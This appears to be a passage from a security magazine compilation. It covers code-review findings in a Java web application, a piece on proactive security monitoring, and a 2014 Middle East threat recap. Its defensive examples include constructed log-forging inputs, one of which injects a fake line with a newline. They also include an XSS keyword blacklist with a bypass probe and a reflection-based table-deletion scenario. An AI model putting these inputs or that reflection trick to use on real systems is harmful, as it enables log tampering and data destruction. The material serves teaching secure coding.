Remediation: Use tokens which help the server identify its client. The Spring framework 3.0 provides a token-based remedy for CSRF.

8. Bypassing Authentication
In Figure 10 you can see that the session token’s value is stored in a hidden field, from which it can easily be retrieved by a man-in-the-middle (MITM). An attacker can use the victim’s session token to bypass the authentication process and gain access to the victim’s profile.

Remediation: Care should be taken that proper session management is followed. The session token should expire after some time. The session token should be a long, random sequence that is difficult to guess. The cookie attributes should be set properly.

9. Data Validation: Improper Input Validation
Many developers use a blacklisting technique, which is not good practice; consider the code displayed in Figure 11. You can see a blacklist provided by the developer. He is blacklisting the script pattern, the JavaScript pattern, eval and onload, but he has not included onmouseover and many other attack vectors in the list.

Remediation: Why not use whitelisting? If I am validating a phone number textbox, why should I say “don’t allow alphabets and special characters” when instead I can say “allow only numbers”? Isn’t it simpler? Just state what is valid.

Another recommendation given by the presenter was to remove the burden of validation from the developer and put it on secure frameworks such as Spring, or on some secure APIs. Nowadays there are various APIs and frameworks available to do the job of input validation and output encoding.

10. Logging & Auditing
Improper logging technique: in Figure 12 we can see that the password is logged in plaintext.

Log Obfuscation

Another possible scenario is a log line such as:

User ‘Ak’ logged in at 2:46pm

Here ‘Ak’ comes from user input. This logging technique can be turned into a tool by an attacker by giving the input ‘AD logged in at 2:40pm User Ak’, so that the logged string becomes:

User ‘AD logged in at 2:40pm User Ak’ logged in at 2:46pm

This helps cover the tracks of the attacker by forging the logs.

Remediation: The log should not contain elements coming from the user as raw input, as he can obfuscate the logs by giving malicious input in order to mask his activities. A password should never be logged as plain text.
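The forging scenario and both remediation points can be shown in a few lines. The Python below is an added example and not code from the reviewed application: unsafe_login_line reproduces the free-text pattern from the scenario (and shows that a newline in the input does even more damage, splitting one event into two lines), while audit_event writes a structured record in which user input is only ever a value, strips control characters, and refuses to log fields whose name marks them as secrets. The user names and timestamps are constructed for the demonstration.

```python
import json
import re

# Control characters (CR, LF, NUL, ...) are what let input start a fake log line.
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def unsafe_login_line(user, time_str):
    """The pattern the article warns about: untrusted text pasted into free text."""
    return "User '{}' logged in at {}".format(user, time_str)


def sanitize_for_log(value, max_len=64):
    """Drop control characters and cap the length so one field cannot flood the log."""
    return CONTROL_CHARS.sub("", str(value))[:max_len]


def audit_event(event, user, time_str, **fields):
    """Structured log record: user input is a JSON value, never part of the line's
    syntax, so a parser reads it back exactly as one field. Secret-looking field
    names are refused outright instead of relying on the caller to remember."""
    for forbidden in ("password", "passwd", "secret", "token"):
        if forbidden in fields:
            raise ValueError("refusing to log field: " + forbidden)
    record = {"event": event, "user": sanitize_for_log(user), "time": time_str}
    record.update({k: sanitize_for_log(v) for k, v in fields.items()})
    return json.dumps(record, separators=(",", ":"))


def parse_audit_line(line):
    """What a log consumer does: one line, one record, fields unambiguous."""
    return json.loads(line)


# Constructed attacker input from the article's scenario, plus a newline variant.
FORGED_USER = "AD logged in at 2:40pm User Ak"
NEWLINE_USER = "Ak\nUser 'AD' logged in at 2:40pm"

if __name__ == "__main__":
    print(unsafe_login_line(FORGED_USER, "2:46pm"))     # reads like two events
    print(unsafe_login_line(NEWLINE_USER, "2:46pm"))    # really is two lines
    print(audit_event("login", FORGED_USER, "2:46pm"))  # one record, user field intact
    print(audit_event("login", NEWLINE_USER, "2:46pm", ip="198.51.100.7"))
```

Structured records are the stronger half of the remedy: sanitizing alone still leaves an analyst guessing where the user-supplied text ends, whereas a JSON field boundary removes the ambiguity entirely.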

11. Improper Use of Reflection
What is reflection? Reflection is the ability to examine or modify the properties or behavior of an object at runtime.

Scenario of attack: I am a disgruntled employee. I am resigning, but I have been so frustrated with my job that I intend to harm the company without getting caught by the application’s logging. I create the page shown in Figure 13.


In Figure 13 you can see that a class ‘ReflectionandMore’ is created which has a constructor defined. In the definition of the constructor a connection to the database is made, and the next step is deletion of some table. This class is not called anywhere in the application; therefore, when you run a code review tool on it, the tool will not consider it malicious code and will leave it marked as dead code. Here comes the attack, using reflection as the medium; refer to Figure 14. In the figure you can see that the reflection creates an instance of a class whose name is provided as user input. So the attacker will call this code (Figure 14) and give the malicious class (Figure 13) as input. Thus, when the constructor is called, a JDBC connection is made, and this will ultimately lead to the deletion of the table.

Figure 14: Reflection to call the constructor of malicious class

Figure 15: URL not getting validated

Remediation: The application should have an authorization check for performing activities such as deletion or manipulation of the database. It is suggested that re-authentication should be prompted before performing such an action.

12. URL Redirection Case
There are cases where developers make use of a good output encoding mechanism, such as c:out, to escape injections, but some remedies are applicable to some attacks only. In this case a URL has been taken by the application as the value of a ‘GET’ request parameter (refer to the highlighted section of Figure 15). Even if the developer used quite a good mechanism to escape XSS-type attacks, he forgot to put a check on URL redirection; in such a case an attacker can give the URL of his phishing site as the value of the GET request parameter. The resulting URL will be given to the victim, thus misguiding a legitimate user.

Remediation: Assume all input is malicious. Use an “accept known good” input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Use an intermediate disclaimer page that provides the user with a clear warning that they are leaving the current site. Be careful to avoid XSS problems (CWE-79) when generating the disclaimer page. When the set of acceptable objects, such as file names or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual file names or URLs, and reject all other inputs.
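Items 9, 11 and 12 share one remedy, accept known good, applied to three kinds of input: a form field, a class name handed to reflection, and a redirect target. The Python below is an added example, not the code from Figures 11, 13, 14 or 15, and it covers all three. It reproduces the blacklist from item 9 (the four patterns the article names) to show that the onmouseover input the article mentions passes straight through, and sets an allowlist validator for a phone number beside it; it replaces reflection-by-name with a fixed mapping of permitted action classes; and it maps numeric ids to redirect URLs as the remediation for item 12 describes. The class names, URLs and sample inputs are constructed for the demonstration.

```python
import re

# 9. The blacklist from Figure 11 (patterns named in the article) beside an allowlist.
BLACKLIST = ("<script", "javascript:", "eval(", "onload")


def blacklist_allows(value):
    """Reject only known-bad substrings; whatever the list forgets gets through."""
    lowered = value.lower()
    return not any(bad in lowered for bad in BLACKLIST)


PHONE_RE = re.compile(r"\+?[0-9]{7,15}")


def is_valid_phone(value):
    """Allowlist: state what is valid (optional + then 7 to 15 digits), nothing else."""
    return PHONE_RE.fullmatch(value) is not None


# 11. Reflection: resolve a user-supplied name against a fixed set of permitted
# classes instead of instantiating whatever name arrives (hypothetical classes).
class ProfileReport:
    def run(self):
        return "profile report"


class ExportJob:
    def run(self):
        return "export job"


ALLOWED_ACTIONS = {"ProfileReport": ProfileReport, "ExportJob": ExportJob}


def instantiate_action(name):
    """Anything not in the mapping, including dead classes lying in the code base,
    is unreachable from user input."""
    cls = ALLOWED_ACTIONS.get(name)
    if cls is None:
        raise ValueError("unknown action: " + name)
    return cls()


# 12. Redirects: fixed ids mapped to URLs; an unknown id falls back to a local page.
REDIRECT_TARGETS = {
    "1": "https://partner.example/login",
    "2": "https://help.example/docs",
}


def resolve_redirect(target_id, fallback="/"):
    """The request carries only an id; the URL never comes from the client."""
    return REDIRECT_TARGETS.get(target_id, fallback)


if __name__ == "__main__":
    probe = "hi onmouseover=x"        # constructed input the article says the blacklist misses
    print("blacklist lets it through:", blacklist_allows(probe))
    print("phone allowlist rejects it:", not is_valid_phone(probe))
    print(instantiate_action("ExportJob").run(), "|", resolve_redirect("2"),
          "|", resolve_redirect("https://phish.example"))
```

The three validators have the same shape on purpose: each names the full set of acceptable values and treats everything else as an error, so there is no list of bad inputs to keep up to date.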

Figure 16: Using open relay SMTP server

13. SMTP Server Spamming Case: It is bad to have a hardcoded SMTP password in code, but it is the worst case to have no password defined for the SMTP server at all. If an attacker comes to know of it, he can use this vulnerability of the victim server to spam other parties’ mailboxes; here the web application hosting server becomes the medium of attack. In the figure below we can see that mail is being sent using an open relay SMTP server. An open relay allows anyone on the internet to send mail. They are really unpopular as they can be exploited for spamming.

Remediation: Provide a strong password for the SMTP server, which should not be hardcoded.


Defining a Proactive Security Monitoring Strategy

About The Author

Harris D. Schwartz, Safeway Corporate Information Security Lead, Incident Response & Cyber Threat Intelligence

An information security professional with 20+ years of private sector experience specializing in the development and implementation of world class incident response programs, investigations and cyber threat intelligence programs. Harris is currently the leader for incident response and cyber threat intelligence for Safeway, Inc., one of the largest grocery retail companies in North America.


As the realm of cyber security threats continues to change, trend, increase and in some instances become targeted, it is important for companies to modify or change their defense strategy in alignment with industry trends. In my 20+ years in the corporate and information security industry, working proactively has had far better advantages than sitting around and waiting for something to happen. There are still companies today that choose the reactive route because their mindset is either stuck in an old culture that has worked for the last number of years, or they choose not to know what is happening in their networks and environment.

In some cases, moving from an entirely reactive state to a proactive approach may still have its internal challenges with peers, your legal department and other groups within the company. It is important as security professionals in a corporation to constantly educate and build awareness with your peers and stakeholders, especially executive leadership and your legal department. When you have built the perfect relationship, or partnership, you will find that they will approach you and ask for your recommended strategy moving forward, essentially as a subject matter expert. It is unfortunate that too many times I have found peers afraid or scared of their executives or legal professionals. If this happens, making important decisions for your company will take time, and by the time you get around to accomplishing what you need to, it will be too late.

So what do I consider to be reactive vs. proactive?

It is important to operate a SIEM (security information and event manager) tool to which all of your various IT appliances and tools (firewalls, IDS/IPS, etc.) send their logs for alerting purposes. Most SIEM infrastructures conduct aggregation and correlation of these logs and, coupled with further rules, signatures and threat intelligence, can alert your security operations staff about notable security events on your network, which would then require an analyst to review, assess, triage and remediate as necessary. Every company will have a reactionary response to events of this nature. This model has been the norm for a long time, and it is simply not enough to ensure your network is free of attackers and unauthorized individuals. In some companies and organizations the security team manages the SIEM 100%, while others may augment staff with an MSSP (Managed Security Services Provider). What else is necessary in today’s modern cyber world?

The other 80% of the rule is the proactive approach. What does proactive really mean? It could have different definitions from one person to another. I have always been a fan and proponent of proactive operations. One advantage is getting to know, on an intimate scale, what is normal activity on your network and, plainly, what is not normal: all the small, medium and large scale abnormalities, anomalies and unknowns of the network. The way to figure out what is normal and what is not is to dig into your network activity, utilize various technology tools and applications to help support proactive monitoring, run down all anomalies and suspicious activity, conduct heightened monitoring surrounding critical operations and systems in your enterprise, get to know the system administrators and ask questions.

I will give you an example. My team was using a known monitoring tool to keep an eye out for any outbound traffic that was deemed suspicious or out of the norm, e.g. beaconing traffic from an internal host to an external host or between two internal hosts. This type of activity could be evidence of an internal host infection talking to a command and control botnet or other malicious IP address. In this particular example, traffic was communicating between two different internal hosts and some of the traffic was attempting to access a privileged account. In the end, the investigation determined that although there was traffic between the two hosts, the access attempt to the privileged account was blocked, and on top of it all, the entire event identified known network backup activity that occurs on the network late at night. These were circumstances we didn’t know about, but now we do.

Why else is proactive monitoring important?

Well, if your company or entity is one that deals in sensitive information, whether that be nation state secrets, customer personal information (what we call PII in the Americas), credit card and payment data (PCI) and/or patient and medical data (ePHI), then consider that this information in the wrong hands can cripple your company and business, cost you millions, damage your reputation in seconds and bring all sorts of legal troubles to your executives and board members. Proactive monitoring along these lines should be a combination of technology (tools and applications) and human interaction and surveillance of your network environment.

Let’s face it, breaches and incidents typically occur when a company least expects them. Industry trends showed that most attacks occurred Friday to Sunday; now attackers are taking different approaches to attacks and breaches. While they are deploying malicious code that operates in stealth mode, they still have to exfiltrate your data, in slow and steady moves so that the activity is not “detectable”. This is why security professionals need to take a different stance with regard to cyber security, “Always under attack” or “Imminent Danger”: being aware and proactive will allow companies to observe, identify, prevent and mitigate cyber threats much faster than if they operated in a 100% reactionary stance.

Maintaining a proactive strategy also requires good relationships and partnerships among your peers, support groups and stakeholders within your organization. If you haven’t started building those relationships yet, you should start as soon as you can. The days of keeping to ourselves and within a silo are well over; that approach won’t help but will hinder your efforts. Building a notification list of important people to contact in the organization will only assist in your proactive efforts, and afford you the ability to respond quickly to a real live security incident.


2014 Security Recap

Information Security Is a Challenge in The Middle East

About The Author

Abdul Rehman, Senior Consultant (IS/IT)

10 years of experience in Information Security and Technology, working mainly with ministries and authorities of Oman. Expert in Information Security Audits, Security Assessments and Digital Forensics.

2014 has passed and we have just entered 2015. If you look at 2014 from the perspective of Information Security, the picture is a bit scary. Heartbleed and ShellShock gave surprises to everybody. Giant corporates and big empires spent a lot of man-days on evaluation, risk assessments, patching and other activities to make sure their information is secure. Another surprising and shocking thing was the discovery of critical vulnerabilities in open source software. These vulnerabilities impacted the whole computing world. And then there were cyber-attacks: whether it is the US-China cock-fight/cyber war, Chinese vs. Russian hackers, stories of the Syrian Cyber Army, “Big Achievements of Anonymous Group” or other hacking incidents, they have made 2014 a memorable year.


According to the IBM Cyber Security Intelligence Index, an average large company had to filter through 1,400 cyber-attacks weekly to identify the 1.7 incidents that can do harm

Hackers attracted towards the Middle East

Apart from the well-known names in cyberspace like the US, China, Russia etc., the number of cyber-attacks increased in the Middle East region in 2014, and it will continue to increase in 2015 as well for many obvious reasons. A sample of 30 of the world’s largest Fortune 500 companies generated visitor traffic to websites that host malware, with a sharp rise in malware attacks on the Middle East’s oil and gas sector. Various websites of KSA, Oman and UAE were publicly defaced in 2014. As business opportunities are growing in the Middle East region, it means more complex security threats. Businesses across the Middle East are at high risk, with 65% of employees having no awareness of information security, Cisco’s recent Middle East ICT Security Study says.

http://me.kaspersky.com/en/about/news/virus/2014/the-number-of-cyber-threats-in-the-Middle-East-continues-to-grow

Kaspersky Lab also presented statistics for the Middle East in the first quarter of 2014. The Kingdom of Saudi Arabia has the highest total number of local and online malware detections, closely followed by the United Arab Emirates. Bahrain and Lebanon were the safest countries, according to these statistics, with the region’s lowest threat levels.

http://me.kaspersky.com/en/about/news/virus/2014/Kaspersky_Lab_reports_on_cyber_threats_in_the_Middle_East_in_the_first_quarter_of_2014

Moral of the Story

Information Security should be a boardroom discussion in 2015. Sheer planning initiatives need to be taken from the top in both the government and business sectors. Information Security should not be considered as IT Security only. Steps should be taken for Information Security awareness among employees.

Points to Ponder

It should be made clear this year that information security is critical to today’s business and that any compromise of information assets can damage organizations. The key initiative is effective enterprise-wide risk management and awareness. Identify what information needs to be protected. What are the possible risks to your information and how much risk can you accept? What security measures do you need? Do the security measures work after implementation? Be a hard target to exploit and learn from the mistakes you made in 2014. May the God of all SECURITY be with you.

An annual report by Trend Micro (a security software company) says the top threat in the Middle East is adware, while email reputation queries, also known as spam email, totaled 24 million in the third quarter (Q3) of 2014, including 14 million in Saudi Arabia, 8 million in the UAE, and 2 million in the rest of the Middle East. The region had 1.5 million malware detections in Q3 2014, with online banking malware, ransomware, and malicious websites and mobile apps presenting high risk. According to the report, targeted attack campaigns will continue to multiply in 2015, after cybercriminals achieved noteworthy breaches via targeted attacks in the US. As per another report by Kaspersky, altogether in the first quarter of 2014 Kaspersky Lab products neutralized more than 34.9 million cyber-attacks and malware infections on computers and mobile devices in the Middle East, representing an increase of almost 10% year-on-year (2013’s figure was 31.6 million).
